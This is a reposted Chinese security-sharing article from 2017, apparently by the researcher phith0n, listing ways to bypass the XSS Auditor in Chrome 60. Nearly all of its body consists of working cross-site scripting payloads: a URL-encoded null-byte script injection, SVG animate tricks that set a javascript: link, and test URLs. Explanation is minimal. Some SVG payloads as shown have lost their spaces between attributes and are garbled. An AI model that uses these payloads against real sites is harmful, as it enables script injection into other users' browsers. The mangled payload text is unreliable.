IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

【技术分享】浏览器安全 / Chrome XSS Auditor bypass

发布时间:2017-08-16 00:08文章来源:安全客文章作者: admin点击次数:
作者: phith0n @长亭科技 Universal Bypass 5 最新版 Chrome 60 context = null test http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e Bypass 4 (需

http://p1.qhimg.com/t0100957c67beed182d.jpg

作者:phith0n@长亭科技



Universal Bypass 5


最新版 Chrome 60

context = null

test

http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e


Bypass 4 (需交互的bypass)


chrome 60

?c=<svg><animatehref=#xattributeName=hrefvalues=&#x3000;javascript:alert(1)/><aid=x><rectwidth=100height=100/></a>
//or
?c=<svgwidth=10000pxheight=10000px><a><rectwidth=10000pxheight=10000pxz-index=9999999/><animateattributeName=hrefvalues=javas&#99ript:alert(1)>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Canimate%20href%3D%23x%20attributeName%3Dhref%20values%3D%26%23x3000%3Bjavascript%3Aalert%281%29%20%2F%3E%3Ca%20id%3Dx%3E%3Crect%20width%3D100%20height%3D100%20%2F%3E%3C%2Fa%3E
【技术分享】浏览器安全 / Chrome XSS Auditor bypass
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/netsafe/xitong/1045412.html

标签分类:

上一篇:上一篇:【木马分析】来自SambaCry创作者的又一杰作:CowerSnail木马分析
下一篇: 下一篇:没有了
无觅关联推荐,快速提升流量